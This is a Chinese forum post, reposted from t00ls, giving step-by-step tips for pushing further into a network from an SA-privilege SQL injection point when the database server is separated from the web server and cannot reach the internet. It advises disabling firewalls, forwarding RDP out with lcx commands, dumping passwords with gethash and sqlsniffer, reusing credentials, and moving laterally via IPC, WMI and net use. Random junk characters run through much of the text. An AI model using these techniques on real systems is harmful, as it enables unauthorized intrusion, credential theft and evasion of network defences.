当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
! ^4 `3 P' g; z& u
' }" E2 m9 y! r, }
+ Y' z. n# J. h5 k+ y, q7 H( u- o6 y+ l+ S }
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出) e; l4 c+ p* p6 e
+ m8 y4 I8 T+ H( S! F$ ~& ~
{! n/ Q: L( r) J2 R! u5 M. F一、DB机有公网IP.
2 W! u7 ~; J8 v# Q( P
: K0 C3 k( I) H+ ^. N$ g/ H* W1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.5 F7 E+ g8 t$ ]( H
+ e. T) ^' i/ B/ e* `! ?2 l8 o0 S/ P2 F% S6 V+ E( o
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
% @* }4 L1 J3 v2 L9 w" A5 J) n9 z% m" m
7 b; i) s0 e& q w3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com- T5 A& [& I4 V2 l
" \, [! h l. g3 G& T
3 O G% R. R0 _4 |$ ~4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用., b$ q" \9 J4 g$ G" X* K( f" |
; b4 B X1 w7 R' X2 W3 P& P+ z3 C% J/ g
- e" {, A5 K# B2 J
+ R: j4 M' g) c) f
二、DB机只有内网IP$ n3 T3 ?' Z& z& g2 y3 ^2 f
$ C& C3 G& ^: I7 b1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.- i. s) j8 z! ^3 d% _
0 e2 {' T$ C- j: c& M9 q; X
5 {4 f8 O, v! F
2:停掉防火墙和IP策略再从内往外扫描.
1 N* e4 q. H! S/ v0 X
6 G- H% c2 Y# z# [- O. s! x/ Z! I( \: ~& e: {# R
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
$ t5 x" @& @0 \0 x4 g$ q. @2 [8 ?6 R t
f/ q f: Y6 p: A. p4:学会密码规律分析往往会有惊喜.
/ l8 n2 W8 ?* a8 z4 n
9 ]; z5 ?, J# B5 Q; }
) `6 z, L: T. D, y5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等 V' h! g+ h. K2 y) T
6 _" A2 |: w& G2 \
& q3 S% i$ Q' j* e1 F" J P有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对